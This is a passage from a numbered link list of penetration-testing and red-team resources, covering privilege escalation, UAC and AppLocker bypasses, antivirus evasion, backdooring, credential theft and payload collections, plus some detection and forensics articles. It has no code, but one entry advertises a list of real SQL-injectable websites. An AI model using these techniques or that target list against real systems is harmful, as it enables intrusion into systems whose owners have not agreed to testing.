-196-How to find any CEO’s email address in minutes: https://medium.com/p/70dcb96e02b0 197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation: https://www.exploit-db.com/download/44630.txt -199-Microsoft Word upload to Stored XSS: https://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/ -200-MobileApp-Pentest-Cheatsheet: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet -201-awesome: https://github.com/sindresorhus/awesome -201-writing arm shellcode: https://azeria-labs.com/writing-arm-shellcode/ -202-debugging with gdb introduction: https://azeria-labs.com/debugging-with-gdb-introduction/ -203-emulate raspberrypi with qemu: https://azeria-labs.com/emulate-raspberry-pi-with-qemu/ -204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method: https://medium.com/p/a5807a9a8056 -205-A Red Teamer's guide to pivoting: https://artkond.com/2017/03/23/pivoting-guide/ -206-Using WebDAV features as a covert channel: https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/ -207-A View of Persistence: https://rastamouse.me/2018/03/a-view-of-persistence/ -208- pupy websocket transport: https://bitrot.sh/post/28-11-2017-pupy-websocket-transport/ -209-Subdomains Enumeration Cheat Sheet: https://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html -210-DNS Reconnaissance – DNSRecon: https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/ -211-Cheatsheets: https://bitrot.sh/cheatsheet -212-Understanding Guide to Nmap Firewall Scan (Part 2): http://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2 -213-Exploit Office 2016 using CVE-2018-0802: https://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html -214-windows-exploit-suggester: https://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html -215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS: https://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html -216-IDS, IPS AND FIREWALL EVASION USING NMAP: https://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html -217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet 218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals: https://gbhackers.com/web-application-security-tools-resources -219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet -220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing: https://gbhackers.com/top-500-important-xss-cheat-sheet -221-USBStealer – Password Hacking Tool For Windows Machine Applications: https://gbhackers.com/pasword-hacking -222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals: https://gbhackers.com/mobile-application-penetration-testing -223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now: https://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now -224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method: https://gbhackers.com/manual-sql-injection-2 -225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers: https://gbhackers.com/email-spoofing-exploiting-open-relay -226-Email Header Analysis – Received Email is Genuine or Spoofed: https://gbhackers.com/email-header-analysis -227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals: https://gbhackers.com/cyber-threat-intelligence-tools -228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool: https://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool -229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -230-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -231-A8-Cross-Site Request Forgery (CSRF): https://gbhackers.com/a8-cross-site-request-forgery-csrf -232-Fully undetectable backdooring PE File: https://haiderm.com/fully-undetectable-backdooring-pe-file/ -233-backdooring exe files: https://haiderm.com/tag/backdooring-exe-files/ -234-From PHP (s)HELL to Powershell Heaven: https://medium.com/p/da40ce840da8 -235-Forensic Investigation of Nmap Scan using Wireshark: http://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark -236-Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki -237-wifi-arsenal: https://github.com/0x90/wifi-arsenal -238-XXE_payloads: https://gist.github.com/staaldraad/01415b990939494879b4 -239-xss_payloads_2016: https://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016 -240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.: https://github.com/alebcay/awesome-shell -241-The goal of this repository is to document the most common techniques to bypass AppLocker.: https://github.com/api0cradle/UltimateAppLockerByPassList -242-A curated list of CTF frameworks, libraries, resources and softwares: https://github.com/apsdehal/awesome-ctf -243-A collection of android security related resources: https://github.com/ashishb/android-security-awesome -244-OSX and iOS related security tools: https://github.com/ashishb/osx-and-ios-security-awesome -245-regexp-security-cheatsheet: https://github.com/attackercan/regexp-security-cheatsheet -246-PowerView-2.0 tips and tricks: https://gist.github.com/HarmJ0y/3328d954607d71362e3c -247-A curated list of awesome awesomeness: https://github.com/bayandin/awesome-awesomeness -248-Android App Security Checklist: https://github.com/b-mueller/android_app_security_checklist -249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat: https://github.com/brannondorsey/wifi-cracking -250-My-Gray-Hacker-Resources: https://github.com/bt3gl/My-Gray-Hacker-Resources -251-A collection of tools developed by other researchers in the Computer Science area to process network traces: https://github.com/caesar0301/awesome-pcaptools -252-A curated list of awesome Hacking tutorials, tools and resources: https://github.com/carpedm20/awesome-hacking -253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.: https://github.com/cn0xroot/RFSec-ToolKit -254-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -255-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -256-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -257-A curated list of awesome forensic analysis tools and resources: https://github.com/cugu/awesome-forensics -258-Open-Redirect-Payloads: https://github.com/cujanovic/Open-Redirect-Payloads -259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook -260-Windows memory hacking library: https://github.com/DarthTon/Blackbone -261-A collective list of public JSON APIs for use in security.: https://github.com/deralexxx/security-apis -262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.: https://github.com/devsecops/awesome-devsecops -263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi: https://github.com/diasdavid/awesome-hacking-spots -264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups: https://github.com/djadmin/awesome-bug-bounty -265-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom: https://github.com/enddo/awesome-windows-exploitation -267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development: https://github.com/FabioBaroni/awesome-exploit-development -268-A curated list of awesome reversing resources: https://github.com/fdivrp/awesome-reversing -269-Git All the Payloads! A collection of web attack payloads: https://github.com/foospidy/payloads -270-GitHub Project Resource List: https://github.com/FuzzySecurity/Resource-List -271-Use your macOS terminal shell to do awesome things.: https://github.com/herrbischoff/awesome-macos-command-line -272-Defeating Windows User Account Control: https://github.com/hfiref0x/UACME -273-Free Security and Hacking eBooks: https://github.com/Hack-with-Github/Free-Security-eBooks -274-Universal Radio Hacker: investigate wireless protocols like a boss: https://github.com/jopohl/urh -275-A curated list of movies every hacker & cyberpunk must watch: https://github.com/k4m4/movies-for-hackers -276-Various public documents, whitepapers and articles about APT campaigns: https://github.com/kbandla/APTnotes -277-A database of common, interesting or useful commands, in one handy referable form: https://github.com/leostat/rtfm -278-A curated list of tools for incident response: https://github.com/meirwah/awesome-incident-response -279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys: https://github.com/meitar/awesome-lockpicking -280-A curated list of static analysis tools, linters and code quality checkers for various programming languages: https://github.com/mre/awesome-static-analysis -281-A Collection of Hacks in IoT Space so that we can address them (hopefully): https://github.com/nebgnahz/awesome-iot-hacks -281-A Course on Intermediate Level Linux Exploitation: https://github.com/nnamon/linux-exploitation-course -282-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -283-A curated list of awesome infosec courses and training resources.: https://github.com/onlurking/awesome-infosec -284-A curated list of resources for learning about application security: https://github.com/paragonie/awesome-appsec -285-an awesome list of honeypot resources: https://github.com/paralax/awesome-honeypots 286-GitHub Enterprise SQL Injection: https://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493 -287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis: https://github.com/secfigo/Awesome-Fuzzing -288-PHP htaccess injection cheat sheet: https://github.com/sektioneins/pcc/wiki -289-A curated list of the awesome resources about the Vulnerability Research: https://github.com/sergey-pronin/Awesome-Vulnerability-Research -290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF: https://github.com/swisskyrepo/PayloadsAllTheThings -291-A collection of Red Team focused tools, scripts, and notes: https://github.com/threatexpress/red-team-scripts -292-Awesome XSS stuff: https://github.com/UltimateHackers/AwesomeXSS -293-A collection of hacking / penetration testing resources to make you better!: https://github.com/vitalysim/Awesome-Hacking-Resources -294-Docker Cheat Sheet: https://github.com/wsargent/docker-cheat-sheet -295-Decrypted content of eqgrp-auction-file.tar.xz: https://github.com/x0rz/EQGRP -296-A bunch of links related to Linux kernel exploitation: https://github.com/xairy/linux-kernel-exploitation -297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -298-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -299-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: -301-Reading Your Way Around UAC (Part 1): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html -302--Reading Your Way Around UAC (Part 2): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html -303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2): https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/ -304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/p/29d034c27978 -304-Automating Cobalt Strike,Aggressor Collection Scripts: https://github.com/bluscreenofjeff/AggressorScripts https://github.com/harleyQu1nn/AggressorScripts -305-Vi Cheat Sheet: https://highon.coffee/blog/vi-cheat-sheet/ -306-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -307-LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/ -308-Systemd Cheat Sheet: https://highon.coffee/blog/systemd-cheat-sheet/ -309-Aircrack-ng Cheatsheet: https://securityonline.info/aircrack-ng-cheatsheet/ -310-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/?p=7212 -311-Wifi Pentesting Command Cheatsheet: https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/ -312-Android Testing Environment Cheatsheet (Part 1): https://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/ -313-cheatsheet: https://randomkeystrokes.com/category/cheatsheet/ -314-Reverse Shell Cheat Sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/ -315-Linux Commands Cheat Sheet: https://highon.coffee/blog/linux-commands-cheat-sheet/ -316-Linux Privilege Escalation using Sudo Rights: http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights -317-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -318-Linux Privilege Escalation by Exploiting Cronjobs: http://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ -319-Web Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -320-Webshell to Meterpreter: http://www.hackingarticles.in/webshell-to-meterpreter -321-WordPress Penetration Testing using WPScan & Metasploit: http://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit -322-XSS Exploitation in DVWA (Bypass All Security): http://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security -323-Linux Privilege Escalation Using PATH Variable: http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -324-VNC tunneling over SSH: http://www.hackingarticles.in/vnc-tunneling-ssh -325-VNC Pivoting through Meterpreter: http://www.hackingarticles.in/vnc-pivoting-meterpreter -326-Week of Evading Microsoft ATA - Announcement and Day 1: https://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html -327-Abusing DNSAdmins privilege for escalation in Active Directory: https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html -328-Using SQL Server for attacking a Forest Trust: https://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html -329-Empire : http://www.harmj0y.net/blog/category/empire/ -330-8 Deadly Commands You Should Never Run on Linux: https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/ -331-External C2 framework for Cobalt Strike: https://www.insomniacsecurity.com/2018/01/11/externalc2.html -332-How to use Public IP on Kali Linux: http://www.hackingarticles.in/use-public-ip-kali-linux -333-Bypass Admin access through guest Account in windows 10: http://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10 -334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports): http://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports -335-Bypass SSH Restriction by Port Relay: http://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay -336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key): http://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key -337-Bypass UAC in Windows 10 using bypass_comhijack Exploit: http://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit -338-Bind Payload using SFX archive with Trojanizer: http://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer -339-Capture NTLM Hashes using PDF (Bad-Pdf): http://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf -340-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/ -341-Detect SQL Injection Attack using Snort IDS: http://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/ -342-Beginner Guide to Website Footprinting: http://www.hackingarticles.in/beginner-guide-website-footprinting/ -343-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -344-Wifi Post Exploitation on Remote PC: http://www.hackingarticles.in/wifi-post-exploitation-remote-pc/ -335-Check Meltdown Vulnerability in CPU: http://www.hackingarticles.in/check-meltdown-vulnerability-cpu -336-XXE: https://phonexicum.github.io/infosec/xxe.html -337-[XSS] Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -338-Engagement Tools Tutorial in Burp suite: http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite -339-Wiping Out CSRF: https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f -340-First entry: Welcome and fileless UAC bypass: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ -341-Writing a Custom Shellcode Encoder: https://medium.com/p/31816e767611 -342-Security Harden CentOS 7 : https://highon.coffee/blog/security-harden-centos-7/ -343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS: https://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html -344-MySQL: https://websec.ca/kb/CHANGELOG.txt -345-Deobfuscation of VM based software protection: http://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf -346-Online Assembler and Disassembler: http://shell-storm.org/online/Online-Assembler-and-Disassembler/ -347-Shellcodes database for study cases: http://shell-storm.org/shellcode/ -348-Dynamic Binary Analysis and Obfuscated Codes: http://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf -349-How Triton may help to analyse obfuscated binaries: http://triton.quarkslab.com/files/misc82-triton.pdf -350-Triton: A Concolic Execution Framework: http://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf -351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM: https://github.com/JonathanSalwan/Tigress_protection -352-What kind of semantics information Triton can provide?: http://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/ -353-Code coverage using a dynamic symbolic execution: http://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/ -354-Triton (concolic execution framework) under the hood: http://triton.quarkslab.com/blog/first-approach-with-the-framework/ -355-- Stack and heap overflow detection at runtime via behavior analysis and Pin: http://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/ -356-Binary analysis: Concolic execution with Pin and z3: http://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/ -357-In-Memory fuzzing with Pin: http://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/ -358-Hackover 2015 r150 (outdated solving for Triton use cases): https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py -359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection: https://gbhackers.com/skipfish-web-application-security-scanner -360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains: https://gbhackers.com/sublist3r-penetration-testers -361-bypassing application whitelisting with bginfo: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ -362-accessing-clipboard-from-the-lock-screen-in-windows-10: https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/ -363-bypassing-device-guard-umci-using-chm-cve-2017-8625: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ -364-defense-in-depth-writeup: https://oddvar.moe/2017/09/13/defense-in-depth-writeup/ -365-applocker-case-study-how-insecure-is-it-really-part-1: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -366-empires-cross-platform-office-macro: https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/ -367-recon tools: https://blackarch.org/recon.html -368-Black Hat 2018 tools list: https://medium.com/p/991fa38901da -369-Application Introspection & Hooking With Frida: https://www.fuzzysecurity.com/tutorials/29.html -370-And I did OSCP!: https://medium.com/p/589babbfea19 -371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests: https://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html -372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals: https://gbhackers.com/threat-intelligence-tools -373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: https://techincidents.com/penetration-testing-cheat-sheet/ -374-privilege escalation: https://toshellandback.com/category/privilege-escalation/ -375-The Complete List of Windows Post-Exploitation Commands (No Powershell): https://medium.com/p/999b5433b61e -376-The Art of Subdomain Enumeration: https://blog.sweepatic.com/tag/subdomain-enumeration/ -377-The Principles of a Subdomain Takeover: https://blog.sweepatic.com/subdomain-takeover-principles/ -378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!: https://medium.com/p/b250fb40af82 -379-The Solution for Web for Pentester-I: https://medium.com/p/4c21b3ae9673 -380-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended: https://www.hackingloops.com/hacking-tricks/ -383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology: https://www.hackingloops.com/exploitation-terminology/ -384-How Hackers Kick Victims Off of Wireless Networks: https://www.hackingloops.com/kick-victims-off-of-wireless-networks/ -385-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -386-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom: https://www.hackingloops.com/msfvenom/ -388-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky: https://www.hackingloops.com/payloads-via-usb-rubber-ducky/ -390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1: https://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/ -391-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -392-Cracking NTLMv1 Handshakes with Crack.sh: http://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/ -393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch: https://medium.com/p/d5e92843e64a -394-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -395-Windows Privilege Escalation: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation -396-Removing Sender’s IP Address From Email’s Received: From Header: https://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header -397-Dump Cleartext Password in Linux PC using MimiPenguin: http://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin -398-Embedded Backdoor with Image using FakeImageExploiter: http://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter -399-Exploit Command Injection Vulnearbility with Commix and Netcat: http://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat -400-Exploiting Form Based Sql Injection using Sqlmap: http://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap -401-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -402-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks -403-Command Injection to Meterpreter using Commix: http://www.hackingarticles.in/command-injection-meterpreter-using-commix -404-Comprehensive Guide to Crunch Tool: http://www.hackingarticles.in/comprehensive-guide-to-crunch-tool -405-Compressive Guide to File Transfer (Post Exploitation): http://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation -406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide): http://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng -407-How to Detect Meterpreter in Your PC: http://www.hackingarticles.in/detect-meterpreter-pc -408-Easy way to Hack Database using Wizard switch in Sqlmap: http://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap -409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn): http://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn -410-Create SSL Certified Meterpreter Payload using MPM: http://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm -411-Port forwarding: A practical hands-on guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide -412-Exploit Dev 101: Jumping to Shellcode: https://www.abatchy.com/2017/05/jumping-to-shellcode.html -413-Introduction to Manual Backdooring: https://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html -414-Kernel Exploitation: https://www.abatchy.com/2018/01/kernel-exploitation-1 -415-Exploit Dev 101: Bypassing ASLR on Windows: https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html -416-Shellcode reduction tips (x86): https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86 -417-OSCE Study Plan: https://www.abatchy.com/2017/03/osce-study-plan -418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400): https://www.abatchy.com/2017/10/defcamp-dotnot -419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE: https://www.ambionics.io/ -420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]: https://www.cityofhackerz.com/sql-vulnerable-websites-list-2017 -421-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/tag/forensics/ -422-windows-kernel-logic-bug-class-access: https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html -423-injecting-code-into-windows-protected: https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html -424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE: https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire -425-Automated Derivative Administrator Search: https://wald0.com/?p=14 -426-A Red Teamer’s Guide to GPOs and OUs: https://wald0.com/?p=179 -427-Pen Testing and Active Directory, Part VI: The Final Case: https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/ -428-Offensive Tools and Techniques: https://www.sec.uno/2017/03/01/offensive-tools-and-techniques/ -429-Three penetration testing tips to out-hack hackers: http://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/ -430-Introducing BloodHound: https://wald0.com/?p=68 -431-Red + Blue = Purple: http://www.blackhillsinfosec.com/?p=5368 -432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog: https://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/ -433-PrivEsc: Unquoted Service Path: https://www.gracefulsecurity.com/privesc-unquoted-service-path/ -434-PrivEsc: Insecure Service Permissions: https://www.gracefulsecurity.com/privesc-insecure-service-permissions/ -435-PrivEsc: DLL Hijacking: https://www.gracefulsecurity.com/privesc-dll-hijacking/ -436-Android Reverse Engineering 101 – Part 1: http://www.fasteque.com/android-reverse-engineering-101-part-1/ -437-Luckystrike: An Evil Office Document Generator: https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator -438-the-number-one-pentesting-tool-youre-not-using: https://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using -439-uac-bypass: http://www.securitynewspaper.com/tag/uac-bypass/ -440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities: https://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities -441-Penetration Testing on X11 Server: http://www.hackingarticles.in/penetration-testing-on-x11-server -442-Always Install Elevated: https://pentestlab.blog/2017/02/28/always-install-elevated -443-Scanning for Active Directory Privileges & Privileged Accounts: https://adsecurity.org/?p=3658 -444-Windows Server 2016 Active Directory Features: https://adsecurity.org/?p=3646 -445-powershell: https://adsecurity.org/?tag=powershell -446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection: https://adsecurity.org/?p=2921 -447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack: https://adsecurity.org/?p=3214 -448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation): https://adsecurity.org/?p=2085 -449-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -450-Background: Microsoft Ofice Exploitation: https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/ -451-Automated XSS Finder: https://medium.com/p/4236ed1c6457 -452-Application whitelist bypass using XLL and embedded shellcode: https://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc -453-AppLocker Bypass – Regsvr32: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32 -454-Nmap Scans using Hex Value of Flags: http://www.hackingarticles.in/nmap-scans-using-hex-value-flags -455-Nmap Scan with Timing Parameters: http://www.hackingarticles.in/nmap-scan-with-timing-parameters -456-OpenSSH User Enumeration Time- Based Attack with Osueta: http://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta -457-Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -458-Penetration Testing on Remote Desktop (Port 3389): http://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389 -459-Penetration Testing on Telnet (Port 23): http://www.hackingarticles.in/penetration-testing-telnet-port-23 -460-Penetration Testing in Windows/Active Directory with Crackmapexec: http://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec -461-Penetration Testing in WordPress Website using WordPress Exploit Framework: http://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework -462-Port Scanning using Metasploit with IPTables: http://www.hackingarticles.in/port-scanning-using-metasploit-iptables -463-Post Exploitation Using WMIC (System Command): http://www.hackingarticles.in/post-exploitation-using-wmic-system-command -464-Privilege Escalation in Linux using etc/passwd file: http://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file -465-RDP Pivoting with Metasploit: http://www.hackingarticles.in/rdp-pivoting-metasploit -466-A New Way to Hack Remote PC using Xerosploit and Metasploit: http://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit -467-Shell to Meterpreter using Session Command: http://www.hackingarticles.in/shell-meterpreter-using-session-command -468-SMTP Pentest Lab Setup in Ubuntu (Port 25): http://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu -469-SNMP Lab Setup and Penetration Testing: http://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing -470-SQL Injection Exploitation in Multiple Targets using Sqlmap: http://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap -471-Sql Injection Exploitation with 